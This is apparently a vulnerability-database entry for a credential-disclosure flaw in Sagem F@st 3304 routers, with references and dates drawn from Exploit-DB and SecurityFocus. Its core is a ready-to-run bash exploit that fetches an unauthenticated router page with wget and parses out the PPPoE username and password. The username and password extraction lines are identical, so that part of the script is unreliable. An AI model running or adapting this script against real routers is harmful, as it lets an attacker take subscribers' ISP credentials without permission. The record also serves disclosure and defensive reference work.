ID
VAR-E-201107-0202
EDB ID
35997
TITLE
Sagem F@st 3304 Routers - PPPoE Credentials Information Disclosure - Hardware remote Exploit
Trust: 0.6
DESCRIPTION
Sagem F@st 3304 Routers - PPPoE Credentials Information Disclosure.. remote exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | sagem | model: | f@st routers | scope: | eq | version: | 3304 | Trust: 1.0 |
vendor: | sagem | model: | f@st | scope: | eq | version: | 33040 | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/48908/info
Sagem F@st 3304 router is prone to a remote information-disclosure vulnerability because it fails to restrict access to sensitive information.
A remote attacker exploit this issue to obtain sensitive information, possibly aiding in further attacks.
#!/bin/bash
#########################################
# Exploit Title: Sagem 3304 Routers Get PPPOE Password
# Date 27/07/2011
# Author: securititracker@gmail.com
# Software Link: null
# Version: Sagem Routers F@st 3304
# Tested on: Sagem F@ST 3304
#
#########################################
Usage()
{
echo "Usage : $0 IP_ADDRESS"
}
if [ "$1" != "" ]
then
IP_ADDRESS="$1"
else
Usage
exit 1
fi
USER_NAME=`wget http://$IP_ADDRESS/quickconfname_ADSL.html -t 1 -q -O - | grep "msg051" | tr " " "\n" | grep value | tr -d \\ |tr -d "\"" | awk -F= '{print($2)}' `
USER_PASSWORD=`wget http://$IP_ADDRESS/quickconfname_ADSL.html -t 1 -q -O - | grep "msg051" | tr " " "\n" | grep value | tr -d \\ |tr -d "\"" | awk -F= '{print($2)}' `
echo "Username = $USER_NAME ; Passsword = $USER_PASSWORD"
Trust: 1.0
EXPLOIT LANGUAGE
sh
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
PPPoE Credentials Information Disclosure
Trust: 1.0
CREDITS
securititracker
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 35997 | Trust: 1.9 |
db: | BID | id: | 48908 | Trust: 1.9 |
db: | EDBNET | id: | 57372 | Trust: 0.6 |
REFERENCES
url: | https://www.securityfocus.com/bid/48908/info | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/35997/ | Trust: 0.6 |
url: | http://www.sagem.com/ | Trust: 0.3 |
url: | https://www.exploit-db.com/exploits/35997 | Trust: 0.3 |
SOURCES
db: | BID | id: | 48908 |
db: | EXPLOIT-DB | id: | 35997 |
db: | EDBNET | id: | 57372 |
LAST UPDATE DATE
2022-07-27T09:22:18.632000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 48908 | date: | 2011-07-27T00:00:00 |
SOURCES RELEASE DATE
db: | BID | id: | 48908 | date: | 2011-07-27T00:00:00 |
db: | EXPLOIT-DB | id: | 35997 | date: | 2011-07-27T00:00:00 |
db: | EDBNET | id: | 57372 | date: | 2011-07-27T00:00:00 |